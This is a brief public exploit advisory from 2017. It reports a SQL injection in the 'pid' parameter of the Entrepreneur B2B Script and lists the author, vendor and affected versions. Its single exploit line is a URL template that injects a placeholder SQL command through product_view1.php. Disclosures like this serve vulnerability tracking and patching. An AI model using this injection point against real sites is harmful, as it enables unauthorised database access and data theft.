# Exploit Title: Entrepreneur B2B Script - 'pid' Parameter SQL Injection # Date: 2017-08-02 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: http://readymadeb2bscript.com/ # Version: All Version Exploit : http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command]